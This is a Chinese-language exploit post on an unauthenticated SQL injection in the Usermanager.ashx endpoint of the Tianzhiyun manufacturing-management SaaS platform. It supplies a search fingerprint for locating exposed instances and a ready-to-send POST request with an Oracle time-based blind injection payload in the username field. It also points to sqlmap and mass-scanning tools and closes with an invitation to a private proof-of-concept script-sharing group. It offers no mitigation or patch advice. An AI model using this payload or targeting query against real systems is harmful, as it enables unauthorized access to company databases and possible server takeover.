0x01 产品简介
天智云智造管理平台又称天智云 SAAS 平台,是专业为中小型生产企业提供智能化生产管理的标准MES软件。 该系统向中小型生产企业提供一站式平台服务,串联销售!采购/生产!质量/仓库等各个部门。对内可以节约成本,规范生产过程,实现质量追溯,实时跟踪生产及库存数据,提升管理水平。对外可以提升工厂的软实力,帮助企业更好的接单。
0x02 漏洞概述
天智云智造管理平台 Usermanager.ashx 接囗处存在 SQL注入漏洞,未经授权攻击者可通过该漏洞获取数据库敏感信息,进一步利用可获取服务器权限,导致网站处于极度不安全状态。
0x03 搜索语法
body="Ashx/Usermanager.ashx"
0x04 漏洞复现
POST /Ashx/Usermanager.ashx HTTP/1.1
Host: your-ip
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
type=LOGIN&username=1') AND 8645=DBMS_PIPE.RECEIVE_MESSAGE(CHR(110),5)--&pwd=1&vendor=
sqlmap验证
0x05 工具批量
nuclei
afrog
xray
POC脚本获取
请使用VX扫一扫加入内部POC脚本分享圈子
